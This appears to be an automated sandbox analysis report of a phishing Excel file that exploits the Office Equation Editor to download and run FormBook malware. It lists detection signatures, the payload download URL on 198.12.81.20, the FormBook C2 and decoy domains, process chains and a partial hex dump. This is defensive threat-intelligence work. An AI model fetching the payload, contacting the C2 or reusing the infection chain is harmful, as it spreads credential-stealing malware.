Windows Analysis Report
PO 65738963578 Revise Settlement.xlsx

Overview

General Information

Sample Name: PO 65738963578 Revise Settlement.xlsx
Analysis ID: 626146
MD5: e5c9c992c088a778a6348f4a58dd78d3
SHA1: 754f386df06785ddd4cb4a04bed626ceab65d5ab
SHA256: 6b8ffb251308a2396f35780df9376b329a6c741419db44ea4f89d88ed932fbf2
Tags: VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Shellcode detected
Office equation editor drops PE file
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard

Classification

AV Detection

Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.cortesdisenosroutercnc.com/itq4/"], "decoy": ["worklocalcortland.com", "hostydom.tech", "ittakegenius.com", "clarisfixion.com", "totalzerosband.com", "shop-for-432.club", "exploremytruth.com", "skarpaknivar.com", "teknikunsur.net", "shoppingclick.online", "808gang.net", "solobookings.com", "mikunandina.com", "insumedkap.com", "kingdomcell.com", "qabetalive838475.com", "foxyreal.website", "filmweltruhr.com", "pokibar.com", "girassolpresentes.com", "rprent.com", "klatch22.com", "qam3.com", "bbuur.com", "grandmino.com", "windowcontractor.info", "myownstack.com", "suprebahia.com", "amaliebeac.space", "rugggedclassicvinyl.com", "thevillagetour.com", "obsoletely.xyz", "fintell.online", "mychianfts.net", "skillingyousoftly.com", "mejicat.com", "tntpowerspeedagility.com", "richardklewis.store", "yourdmvhometeam.com", "citestaccnt1631545392.com", "weddingbyneus.com", "mbkjewelry.com", "shubhamsports.com", "bountyhub.xyz", "heritage.solar", "vitalorganicbarsoap.com", "cloandjoe.com", "royalluxextensions.com", "lbrzandvoort.com", "knowmust.xyz", "okpu.top", "balanz.kitchen", "buggy4t.com", "gownstevensond.com", "f4w6.claims", "workingfromgarden.com", "foryourtinyhuman.com", "preventbiotech.com", "happyklikshop.com", "tuyenxanh.com", "lift2.cloud", "skazhiraku.net", "purpleatticexperiment.com", "freebtc.pro"]}
Source: PO 65738963578 Revise Settlement.xlsx Virustotal: Detection: 41%
Source: PO 65738963578 Revise Settlement.xlsx ReversingLabs: Detection: 29%
Source: Yara match File source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: www.cortesdisenosroutercnc.com/itq4/ Avira URL Cloud: Label: malware
Source: http://198.12.81.20/busy/BUSY.exeC: Avira URL Cloud: Label: malware
Source: http://198.12.81.20/busy/BUSY.exeiiC: Avira URL Cloud: Label: malware
Source: http://198.12.81.20/busy/BUSY.exej Avira URL Cloud: Label: malware
Source: http://198.12.81.20/busy/BUSY.exe Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BUSY[1].exe Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: 2.3.EQNEDT32.EXE.998472.2.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 2.3.EQNEDT32.EXE.931118.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 2.3.EQNEDT32.EXE.998472.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 2.2.EQNEDT32.EXE.931118.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 5.2.idcqz.exe.160000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 198.12.81.20 Port: 80
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\hkxhi\tnjelr\oppx\aef3432ff76843aeb030a76c099018f6\zhseks\qyypcejy\Release\qyypcejy.pdb source: vbc.exe, 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmp, idcqz.exe, 00000005.00000000.964431298.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe, 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe, 00000006.00000000.967212091.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe.4.dr, nswAB85.tmp.4.dr
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_00405D7A
Source: C:\Users\Public\vbc.exe Code function: 4_2_004069A4 FindFirstFileW,FindClose, 4_2_004069A4
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040290B FindFirstFileW, 4_2_0040290B

Software Vulnerabilities

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0379043F ShellExecuteW,ExitProcess, 2_2_0379043F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_037903A2 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_037903A2
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03790411 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_03790411
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_037902FD ExitProcess, 2_2_037902FD
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_037903BC URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_037903BC
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03790332 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_03790332
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0379042A ShellExecuteW,ExitProcess, 2_2_0379042A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03790464 ExitProcess, 2_2_03790464
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03790316 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_03790316
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 198.12.81.20:80

Networking

Source: Malware configuration extractor URLs: www.cortesdisenosroutercnc.com/itq4/
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS
Source: Joe Sandbox View IP Address: 198.12.81.20
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 May 2022 14:42:02 GMTServer: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.0.17Last-Modified: Fri, 13 May 2022 11:21:13 GMTETag: "3e719-5dee2df4306a6"Accept-Ranges: bytesContent-Length: 255769Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 21 60 47 ec 40 0e 14 ec 40 0e 14 ec 40 0e 14 2f 4f 51 14 ee 40 0e 14 ec 40 0f 14 49 40 0e 14 2f 4f 53 14 e3 40 0e 14 b8 63 3e 14 e0 40 0e 14 2b 46 08 14 ed 40 0e 14 52 69 63 68 ec 40 0e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a9 9a 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 12 3a 00 00 08 00 00 46 36 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 3b 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 90 3b 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 67 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 
64 61 74 61 00 00 00 b8 eb 39 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 00 01 00 00 90 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 50 0a 00 00 00 90 3b 00 00 0c 00 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: GET /busy/BUSY.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.81.20Connection: Keep-Alive
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_037903A2 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_037903A2
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: EQNEDT32.EXE, 00000002.00000002.962051283.0000000000993000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957716678.0000000000995000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957591304.0000000000993000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.962051283.0000000000993000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957716678.0000000000995000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957591304.0000000000993000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.961987848.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957575421.000000000098D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://198.12.81.20/busy/BUSY.exe
Source: EQNEDT32.EXE, 00000002.00000003.957575421.000000000098D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://198.12.81.20/busy/BUSY.exeC:
Source: EQNEDT32.EXE, 00000002.00000002.961987848.00000000008FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://198.12.81.20/busy/BUSY.exeiiC:
Source: EQNEDT32.EXE, 00000002.00000002.962566315.0000000003790000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://198.12.81.20/busy/BUSY.exej
Source: EQNEDT32.EXE, 00000002.00000003.957494354.0000000000955000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000000.959904121.000000000040A000.00000008.00000001.01000000.00000004.sdmp, BUSY[1].exe.2.dr, vbc.exe.2.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D8559C53.emf
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040580F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 4_2_0040580F

E-Banking Fraud

Source: Yara match File source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BUSY[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: 2.2.EQNEDT32.EXE.931118.0.raw.unpack, type: UNPACKEDPE Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
Source: 2.3.EQNEDT32.EXE.931118.1.unpack, type: UNPACKEDPE Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
Source: 2.3.EQNEDT32.EXE.931118.1.raw.unpack, type: UNPACKEDPE Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
Source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.EQNEDT32.EXE.931118.0.unpack, type: UNPACKEDPE Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_00403646
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B51890 5_2_00B51890
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B596A0 5_2_00B596A0
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B57E88 5_2_00B57E88
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B59C12 5_2_00B59C12
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B5C3BD 5_2_00B5C3BD
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B5A184 5_2_00B5A184
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B5B3F1 5_2_00B5B3F1
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00110A56 5_2_00110A56
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77620000 page execute and read and write
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77740000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 77740000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Memory allocated: 77740000 page execute and read and write
Source: PO 65738963578 Revise Settlement.xlsx Virustotal: Detection: 41%
Source: PO 65738963578 Revise Settlement.xlsx ReversingLabs: Detection: 29%
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Process created: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$PO 65738963578 Revise Settlement.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR63D1.tmp
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@8/16@0/1
Source: C:\Users\Public\vbc.exe Code function: 4_2_004021AA CoCreateInstance, 4_2_004021AA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe Code function: 4_2_00404ABB GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 4_2_00404ABB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\hkxhi\tnjelr\oppx\aef3432ff76843aeb030a76c099018f6\zhseks\qyypcejy\Release\qyypcejy.pdb source: vbc.exe, 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmp, idcqz.exe, 00000005.00000000.964431298.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe, 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe, 00000006.00000000.967212091.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe.4.dr, nswAB85.tmp.4.dr
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B52445 push ecx; ret 5_2_00B52458